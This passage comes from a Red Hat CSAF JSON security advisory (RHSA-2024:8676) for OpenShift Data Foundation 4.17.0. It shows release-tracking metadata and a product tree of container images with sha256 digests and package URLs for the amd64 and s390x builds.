"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2319102"
},
{
"category": "external",
"summary": "2319238",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2319238"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8676.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.17.0 Security, Enhancement, \u0026 Bug Fix Update",
"tracking": {
"current_release_date": "2025-12-03T23:59:40+00:00",
"generator": {
"date": "2025-12-03T23:59:40+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.13"
}
},
"id": "RHSA-2024:8676",
"initial_release_date": "2024-10-30T14:25:22+00:00",
"revision_history": [
{
"date": "2024-10-30T14:25:22+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-30T14:25:22+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-12-03T23:59:40+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RHODF 4.17 for RHEL 9",
"product": {
"name": "RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_data_foundation:4.17::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Data Foundation"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"product": {
"name": "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"product_id": "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d?arch=amd64\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9\u0026tag=v4.17.0-46"
}
}
},
{
"category": "product_version",
"name": "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"product": {
"name": "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"product_id": "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0?arch=amd64\u0026repository_url=registry.redhat.io/odf4/cephcsi-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"product": {
"name": "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"product_id": "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a?arch=amd64\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator\u0026tag=v4.17.0-15"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"product_id": "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4?arch=amd64\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.17.0-69"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"product": {
"name": "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"product_id": "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884?arch=amd64\u0026repository_url=registry.redhat.io/odf4/mcg-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"product_id": "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e?arch=amd64\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.17.0-23"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"product": {
"name": "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"product_id": "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"product": {
"name": "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"product_id": "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.17.0-31"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"product": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"product_id": "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9\u0026tag=v4.17.0-66"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"product": {
"name": "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"product_id": "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"product_id": "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.17.0-60"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"product_id": "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.17.0-29"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"product": {
"name": "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"product_id": "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"product": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"product_id": "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9\u0026tag=v4.17.0-7"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"product": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"product_id": "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"product": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"product_id": "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"product": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"product_id": "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.17.0-17"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"product_id": "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.17.0-14"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"product": {
"name": "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"product_id": "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"product_id": "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.17.0-20"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"product": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"product_id": "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"product": {
"name": "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"product_id": "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"product": {
"name": "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"product_id": "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"product_id": "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.17.0-40"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"product": {
"name": "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"product_id": "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"product": {
"name": "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"product_id": "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438?arch=amd64\u0026repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"product": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"product_id": "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2?arch=amd64\u0026repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator\u0026tag=v4.17.0-51"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"product": {
"name": "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"product_id": "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49?arch=s390x\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9\u0026tag=v4.17.0-46"
}
}
},
{
"category": "product_version",
"name": "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"product": {
"name": "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"product_id": "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9?arch=s390x\u0026repository_url=registry.redhat.io/odf4/cephcsi-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"product": {
"name": "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"product_id": "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580?arch=s390x\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator\u0026tag=v4.17.0-15"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"product_id": "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7?arch=s390x\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.17.0-69"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"product": {
"name": "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"product_id": "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc?arch=s390x\u0026repository_url=registry.redhat.io/odf4/mcg-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"product_id": "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d?arch=s390x\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.17.0-23"
}
}
},
{
"category": "product_version",
